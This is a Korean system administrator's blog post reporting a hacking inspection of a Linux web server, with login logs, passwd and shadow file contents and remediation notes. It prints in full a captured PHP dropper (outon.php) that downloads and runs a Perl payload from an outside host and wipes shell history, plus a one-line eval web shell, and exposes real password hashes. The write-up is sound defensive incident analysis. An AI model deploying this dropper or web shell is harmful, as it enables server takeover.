2018. 3. 2. 14:51 Linux Server/etc

[ 기타 ] 해킹점검


 

 

[해킹점검]



[해킹점검시 유용한 명령어]

[root@localhost src]# w    

[root@localhost src]# netstat -anutp

[root@localhost src]# cat /var/log/message 및 모든로그 확인  // 글자가 깨져있을경우 크래킹이나 해킹의심

[root@localhost src]# pstree uid

[root@localhost src]# lsof |grep uid

[root@localhost src]# last -n 100

[root@localhost src]# vi /etc/passwd , /etc/shadow



[아래 내용은 최근 100회 로그인 내역입니다]

점검한PC 와 106.248.76.211(고객측 아이피로 추정) 에서만 접근 로그가 있으며, 이상없는것으로 판단.

 

[root@localhost src]# last -n 100

15445077 pts/2 115.68.87.2 Sat Sep 17 13:09 still logged in

15445077 pts/0 115.68.87.2 Sat Sep 17 12:41 still logged in

15445077 pts/0 115.68.87.2 Sat Sep 17 12:30 - 12:31 (00:00)

15445077 pts/1 115.68.87.2 Sat Sep 17 12:16 still logged in

15445077 pts/0 115.68.87.2 Sat Sep 17 11:15 - 12:30 (01:14)

15445077 pts/0 115.68.87.2 Thu Sep 1 18:11 - 19:17 (01:05)

15445077 pts/0 106.248.76.211 Wed Jun 22 11:28 - 18:48 (07:19)

root pts/0 115.68.87.2 Thu Jun 9 15:14 - 15:28 (00:14)

15445077 pts/0 106.248.76.211 Wed Jun 8 13:33 - 19:39 (06:05)

15445077 pts/1 106.248.76.211 Wed Jun 8 10:59 - 13:24 (02:25)

root pts/0 115.68.87.2 Wed Jun 8 10:50 - 11:05 (00:15)

15445077 pts/0 115.68.87.2 Wed Jun 8 10:47 - 10:48 (00:01)

15445077 pts/0 106.248.76.221 Tue May 24 17:34 - 18:01 (00:26)

15445077 pts/0 106.248.76.221 Thu May 19 10:43 - 17:57 (07:13)

15445077 pts/1 localhost Tue Apr 5 00:21 - 00:23 (00:02)

15445077 pts/0 localhost Tue Apr 5 00:16 - 00:23 (00:07)

15445077 pts/0 106.248.76.221 Fri Apr 1 10:15 - 14:07 (03:51)

15445077 pts/0 106.248.76.221 Mon Mar 28 17:48 - 18:13 (00:25)

15445077 pts/0 106.248.76.221 Fri Mar 25 10:37 - 11:07 (00:29)

15445077 pts/1 115.68.87.2 Fri Mar 4 10:24 - 11:02 (00:38)

15445077 pts/1 106.248.76.221 Fri Jan 29 10:52 - 17:15 (06:23)

15445077 pts/1 106.248.76.221 Thu Jan 28 10:41 - 18:34 (07:52)

15445077 pts/1 106.248.76.221 Wed Jan 27 11:05 - 18:14 (07:09)

15445077 pts/1 106.248.76.221 Mon Jan 25 13:22 - 18:19 (04:56)

15445077 pts/1 106.248.76.221 Mon Jan 25 10:15 - 11:39 (01:24)

15445077 pts/1 106.248.76.221 Fri Jan 15 16:54 - 18:43 (01:48)

15445077 pts/1 106.248.76.221 Thu Jan 14 16:53 - 18:21 (01:27)

15445077 pts/1 106.248.76.221 Mon Jan 11 11:26 - 15:27 (04:00)

15445077 pts/1 115.68.87.2 Mon Jan 11 05:44 - 05:46 (00:02)

15445077 pts/1 115.68.87.2 Sat Jan 9 10:18 - 10:20 (00:01)

15445077 pts/1 115.68.87.2 Sat Jan 9 10:12 - 10:14 (00:01)

15445077 pts/2 115.68.87.2 Sat Jan 9 09:52 - 10:12 (00:20)

15445077 pts/1 222.122.6.29 Sat Jan 9 09:44 - 10:11 (00:27)

root pts/1 115.68.87.2 Sat Jan 9 05:33 - 08:58 (03:25)

root pts/1 115.68.87.2 Sat Jan 9 05:17 - 05:33 (00:15)

15445077 pts/2 115.68.87.2 Fri Jan 8 18:06 - 18:26 (00:20)

15445077 pts/3 115.68.87.2 Fri Jan 8 17:54 - 17:55 (00:00)

15445077 pts/2 115.68.87.2 Fri Jan 8 17:53 - 18:03 (00:10)

15445077 pts/3 115.68.87.2 Fri Jan 8 16:59 - 17:08 (00:09)

15445077 pts/3 115.68.87.2 Fri Jan 8 16:55 - 16:58 (00:03)

15445077 pts/3 115.68.87.2 Fri Jan 8 16:44 - 16:46 (00:02)

15445077 pts/2 115.68.87.2 Fri Jan 8 16:39 - 17:44 (01:05)

15445077 pts/2 115.68.87.2 Fri Jan 8 16:36 - 16:38 (00:02)

15445077 pts/1 106.248.76.221 Fri Jan 8 10:36 - 18:37 (08:01)

15445077 pts/1 106.248.76.221 Wed Jan 6 15:40 - 18:31 (02:50)

15445077 pts/1 106.248.76.221 Tue Jan 5 15:13 - 18:38 (03:25)

15445077 pts/1 106.248.76.221 Mon Jan 4 15:30 - 18:07 (02:36)

root pts/1 115.68.87.2 Mon Jan 4 14:45 - 15:06 (00:21)

15445077 pts/1 106.248.76.221 Wed Dec 30 18:08 - 19:00 (00:52)

root pts/1 115.68.87.2 Wed Dec 30 17:03 - 17:05 (00:02)

root pts/1 115.68.87.2 Wed Dec 30 16:52 - 17:03 (00:10)

15445077 pts/1 115.68.87.2 Wed Dec 30 16:52 - 16:52 (00:00)

root pts/2 115.68.87.2 Tue Dec 29 11:25 - 11:39 (00:13)

15445077 pts/2 115.68.87.2 Tue Dec 29 11:25 - 11:25 (00:00)

15445077 pts/1 106.248.76.221 Tue Dec 29 10:14 - 19:30 (09:15)

15445077 pts/2 106.248.76.221 Mon Dec 28 16:13 - 18:25 (02:11)

root pts/1 115.68.87.2 Mon Dec 28 15:47 - 17:34 (01:47)

15445077 pts/1 106.248.76.221 Thu Dec 24 10:12 - 19:06 (08:54)

15445077 pts/1 106.248.76.221 Wed Dec 23 11:37 - 18:39 (07:01)

root tty1 Wed Dec 23 13:41 still logged in

15445077 pts/1 115.68.87.2 Wed Dec 23 13:38 - 04:46 (-8:-51)

15445077 pts/2 115.68.87.2 Wed Dec 23 01:21 - 01:21 (00:00)

15445077 pts/1 106.248.76.221 Tue Dec 22 18:54 - 02:41 (07:46)

15445077 pts/2 115.68.87.2 Tue Dec 22 02:51 - 03:13 (00:22)

15445077 pts/1 106.248.76.221 Tue Dec 22 01:47 - 04:12 (02:24)

15445077 pts/1 106.248.76.221 Mon Dec 21 21:43 - 01:04 (03:20)

15445077 pts/1 106.248.76.221 Thu Dec 17 00:46 - 02:58 (02:11)

15445077 pts/1 106.248.76.221 Mon Dec 14 22:58 - 04:03 (05:05)

15445077 pts/1 106.248.76.221 Wed Dec 9 22:31 - 00:26 (01:55)

15445077 pts/1 106.248.76.221 Wed Dec 9 00:14 - 04:36 (04:21)

15445077 pts/1 115.68.87.2 Sat Dec 5 18:19 - 18:19 (00:00)

root pts/2 115.68.87.2 Fri Dec 4 01:11 - 01:53 (00:42)

15445077 pts/1 106.248.76.221 Fri Dec 4 00:58 - 04:10 (03:12)

root pts/1 115.68.87.2 Fri Dec 4 00:55 - 00:56 (00:00)

15445077 pts/1 115.68.87.2 Fri Dec 4 00:20 - 00:20 (00:00)

root pts/1 115.68.87.2 Fri Dec 4 00:20 - 00:20 (00:00)

root pts/2 115.68.87.2 Fri Dec 4 00:03 - 00:20 (00:17)

root tty1 Fri Dec 4 00:00 - 01:42 (01:41)

15445077 pts/1 115.68.87.2 Thu Dec 3 23:56 - 00:08 (00:12)

15445077 pts/1 115.68.87.2 Thu Dec 3 23:53 - 23:54 (00:01)

root pts/0 115.68.87.2 Thu Dec 3 23:15 - 23:29 (00:14)

root pts/0 115.68.87.2 Thu Dec 3 18:21 - 19:40 (01:19)

root pts/0 115.68.87.2 Thu Dec 3 01:51 - 03:16 (01:25)

 

 

 

[아래 passwd파일에 대한 설명]

bash 권한을 가지고 있는 계정 root, 15445077, edu 3계정만 확인이 되며, 이부분 에서는 문제가 없는 것으로 판단.

또한 UID 부분이 0으로 되어있으면 일반 계정이 root 권한을 가지게 되는데, 확인결과 이상 계정없음.

 

# vi /etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin

abrt:x:173:173::/etc/abrt:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin

tcpdump:x:72:72::/:/sbin/nologin

mysql:x:400:400::/usr/local/mysql:/bin/false

15445077:x:500:500::/home/15445077:/bin/bash

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

edu:x:501:100::/home/edu:/bin/bash

 

 

 

[아래 shadow 파일에 대한 설명입니다.]

해당 파일에는 각 계정에 대한 패스워드가 암호화 되어 있는 파일인데, 이상이 있을 경우 암호화 된 문자가 없이 해당 계정만 있을경우 그 계정이 해킹에 사용된 계정으로 의심할 수 있습니다.

Shadow 파일은 이상이 없는것으로 보여짐.

 

# vi /etc/shadow

root:$6$laqpukkw$56tn8pZ8cOrwoHdQj6YiWunDDA5jrDyyJpgKRJX7x520Wj0v9KK76JBkY6yDqT.yPkiJqxDvoUCNQcSAq0PKr.:17045:0:99999:7:::

bin:*:15980:0:99999:7:::

daemon:*:15980:0:99999:7:::

adm:*:15980:0:99999:7:::

lp:*:15980:0:99999:7:::

sync:*:15980:0:99999:7:::

shutdown:*:15980:0:99999:7:::

halt:*:15980:0:99999:7:::

mail:*:15980:0:99999:7:::

uucp:*:15980:0:99999:7:::

operator:*:15980:0:99999:7:::

games:*:15980:0:99999:7:::

gopher:*:15980:0:99999:7:::

ftp:*:15980:0:99999:7:::

nobody:*:15980:0:99999:7:::

dbus:!!:16771::::::

vcsa:!!:16771::::::

rpc:!!:16771:0:99999:7:::

abrt:!!:16771::::::

rpcuser:!!:16771::::::

nfsnobody:!!:16771::::::

haldaemon:!!:16771::::::

ntp:!!:16771::::::

saslauth:!!:16771::::::

postfix:!!:16771::::::

sshd:!!:16771::::::

oprofile:!!:16771::::::

tcpdump:!!:16771::::::

mysql:!!:16771:0:99999:7:::

15445077:$6$Duw5orzQ$FyCRVB5mQ7Og3XEB1p8crhm2pLC/2k3QYgTY/rCYSJkYG8hWHaL7jth4oEaPVRQVc7UGUsASK25mkCawYZB0d/:17045:0:99999:7:::

mailnull:!!:16771::::::

smmsp:!!:16771::::::

edu:$6$47LUPpye$eBuUcfNpZSLQW5Zil2S7cocuHAXUt6gmwmAAaWu/J7uGPKqzP5feeAijgV83MVty3X.svjpqYaNE8PnqHvJBX0:16772:0:99999:7:::

 

 

 

[lastlog 입니다. 계정별로 마지막으로 로그인했던 내역을 보여줍니다.]

고객님께서 사용하시는 계정 15445077계정 외 로그인 기록은 없음

 

사용자이름 포트 어디서 최근정보

root pts/0 115.68.87.2 69 15:14:33 +0900 2016

bin **한번도 로그인한 적이 없습니다**

daemon **한번도 로그인한 적이 없습니다**

adm **한번도 로그인한 적이 없습니다**

lp **한번도 로그인한 적이 없습니다**

sync **한번도 로그인한 적이 없습니다**

shutdown **한번도 로그인한 적이 없습니다**

halt **한번도 로그인한 적이 없습니다**

mail **한번도 로그인한 적이 없습니다**

uucp **한번도 로그인한 적이 없습니다**

operator **한번도 로그인한 적이 없습니다**

games **한번도 로그인한 적이 없습니다**

gopher **한번도 로그인한 적이 없습니다**

ftp **한번도 로그인한 적이 없습니다**

nobody **한번도 로그인한 적이 없습니다**

dbus **한번도 로그인한 적이 없습니다**

vcsa **한번도 로그인한 적이 없습니다**

rpc **한번도 로그인한 적이 없습니다**

abrt **한번도 로그인한 적이 없습니다**

rpcuser **한번도 로그인한 적이 없습니다**

nfsnobody **한번도 로그인한 적이 없습니다**

haldaemon **한번도 로그인한 적이 없습니다**

ntp **한번도 로그인한 적이 없습니다**

saslauth **한번도 로그인한 적이 없습니다**

postfix **한번도 로그인한 적이 없습니다**

sshd **한번도 로그인한 적이 없습니다**

oprofile **한번도 로그인한 적이 없습니다**

tcpdump **한번도 로그인한 적이 없습니다**

mysql **한번도 로그인한 적이 없습니다**

15445077 pts/2 115.68.87.2 917 13:09:10 +0900 2016

mailnull **한번도 로그인한 적이 없습니다**

smmsp **한번도 로그인한 적이 없습니다**

edu **한번도 로그인한 적이 없습니다**

 

  

[의심되는 아파치 로그]

아래내용은 아파치 로그이며, y.cyberunder.org에서 read.txt파일을 다운로드 하는 로그로 보여짐.

계속요청하는것으로 보아서 문제가 있는것으로 판단.

 

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

^M 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 8314 0 8314 0 0 12262 0 --:--:-- --:--:-- --:--:-- 17429^M100 54036 0 54036 0 0 54731 0 --:--:-- --:--:-- --:--:-- 68748

Number found where operator expected at read.txt line 2, near "IE 7"

(Do you need to predeclare IE?)

syntax error at read.txt line 2, near "[if"

Glob not terminated at read.txt line 5.

--2016-09-07 10:01:15-- http://y.cyberunder.org/read.txt

Resolving y.cyberunder.org... 104.27.132.20, 104.27.133.20

Connecting to y.cyberunder.org|104.27.132.20|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: unspecified [text/plain]

Saving to: `read.txt'

 

0K .......... .......... .......... .......... .......... 157K

50K .. 394K=0.3s

 

2016-09-07 10:01:16 (162 KB/s) - `read.txt' saved [54036]

Can't open perl script "read.txt": 그런 파일이나 디렉터리가 없습니다

Can't open perl script "read.txt.txt": 그런 파일이나 디렉터리가 없습니다

 

   

[의심되는 프로세스]

nobody 권한으로 의심되는 프로세스가 구동중.

해당 프로세스들 중지 조치.

 

nobody 18227 15597 0 13:41 ? 00:00:00 sh -c cd '/home/15445077' ; cd /tmp;lwp-download http://y.cyberunder.org/read.txt;perl read.txt;p

 

nobody 18228 18227 0 13:41 ? 00:00:00 /usr/bin/perl -w /usr/bin/lwp-download http://y.cyberunder.org/read.txt

 

  

 

[ftp 의심되는 로그 및 조치내용]

177.41.158.46 186.214.147.149 IP에서 고객님 15445077계정으로 접속하여

/home/15445077/ 경로에 outon.php 파일을 업로드 시킨 로그확인.

Outon.php 파일내용을 토대로 문제가 있을것으로 판단되는 아래 파일들을 /usr/local/src/hacking.tar로 격리조치.

“Outon.php” , “rm.txt” , “read.txt” , “scan.sc” , “neutrinos.sc” (/tmp에 위치했던 파일)

 

 

ftp로그

Wed Sep 7 01:19:39 2016 1 177.41.158.46 4765 /home/15445077/outon.php a _ i r 15445077 ftp 0 * c

Mon Sep 12 10:28:05 2016 1 186.214.147.149 4765 /home/15445077/outon.php a _ i r 15445077 ftp 0 * c

 

  

outon.php 파일의 내용

<?php

$url="http://y.cyberunder.org/";

exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');

exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');

@exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

@exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

@passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

@system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

?>

 

  

chkrootkit , rkhunter 를 이용하여 확인결과 이상없음.

해당 툴은 rootkit이 설치 되어있는지 검사하는 기능 및 주요 파일들의 소유권과 권한에 대한 점검, 데몬들이 이상이 있는지 검사하는 기능을 가지고 있음 

  

[secure 로그]

중국,프랑스, 방글라데시등에서 접근시도는 있었지만 접속은 하지 못함.

elcap 방화벽사용 , 원격접속포트 변경, 복잡한 패스워드로 바꾸실것을 권유

 

Sep 1 00:26:03 localhost sshd[10671]: Failed password for root from 121.18.238.20 port 38305 ssh2

Sep 1 00:25:59 localhost sshd[10630]: Failed password for root from 218.87.109.246 port 8754 ssh2

Sep 1 14:11:20 localhost sshd[5205]: Failed password for root from 116.31.116.5 port 50223 ssh2

Sep 18 04:04:50 localhost sshd[16167]: Failed password for root from 123.49.57.222 port 34239 ssh2

Sep 18 21:00:26 localhost sshd[32386]: Failed password for invalid user guest from 212.129.9.163 port 50479 ssh2

 

  

[휘슬 결과]

휘슬이란 Web Hacking inspection Security Tool 의 약자로써 공격자가 웹서버에 설치한 백도어 프로그램인 웹쉘 및 악성코드은닉 사이트를 탐지하는 프로그램 입니다.

아래 내용은 의심되는 휘슬결과 입니다. 소스 코드부분을 한번 확인권유

 

[1] [1 Found] /home/15445077/log/plug_in/data_backup_manager_english/dump.php

[2] [1 Found] /home/15445077/log/plug_in/data_backup_manager_korean/dump.php

[3] [1 Found] /home/15445077/log/plug_in/data_backup_manager_japanese/dump.php

[4] [1 Found] /home/15445077/log/plug_in/data_backup_manager_chinese_big5/dump.php

[5] [1 Found] /home/15445077/board/upload/15445077_20160404230435.php

 

[1 Found] /home/15445077/log/plug_in/data_backup_manager_english/dump.php

[Web Shell] : 135 : $data=mysql_fetch_array(mysql_query("show create table `$table_name`"));

 

[1 Found] /home/15445077/log/plug_in/data_backup_manager_korean/dump.php

[Web Shell] : 135 : $data=mysql_fetch_array(mysql_query("show create table `$table_name`"));

 

[1 Found] /home/15445077/log/plug_in/data_backup_manager_japanese/dump.php

[Web Shell] : 135 : $data=mysql_fetch_array(mysql_query("show create table `$table_name`"));

 

[1 Found] /home/15445077/log/plug_in/data_backup_manager_chinese_big5/dump.php

[Web Shell] : 135 : $data=mysql_fetch_array(mysql_query("show create table `$table_name`"));

 

[1 Found] /home/15445077/board/upload/15445077_20160404230435.php

[Web Shell] : 2 : <?php @eval($_POST['#']);?>GIF89aGIF89a

 

 

 

해킹점검 요약

177.41.158.46 186.214.147.149 IP에서 고객님 15445077계정으로 접속하여

/home/15445077/ 경로에 outon.php 파일을 업로드한 로그 확인.

nobody 권한으로 해당 프로세스가 구동중이었으며, 해당 프로세스 구동중지시킴.

Outon.php 파일내용을 토대로 문제가 있을것으로 판단되는 아래 파일들을 /usr/local/src/hacking.tar로 격리조치.

“Outon.php” , “rm.txt” , “read.txt” , “scan.sc” , “neutrinos.sc”


저작자표시

'Linux Server > etc' 카테고리의 다른 글

[기타] ssh 패스워드 없이 로그인 하기  (0) 2018.04.15
[기타] 리눅스서버 사이트 이전  (1) 2018.03.02
[기타] Iptables 설치 및 설정  (1) 2018.02.26
[기타] rsync 설치 및 사용법  (0) 2017.08.08
[기타] 리눅스 시간 동기화  (0) 2017.03.09
Posted by 실력키우기
블로그 이미지
공 부 하 는 직 장 인
실력키우기

태그목록

공지사항

Yesterday
Today
Total

최근에 달린 댓글

티스토리툴바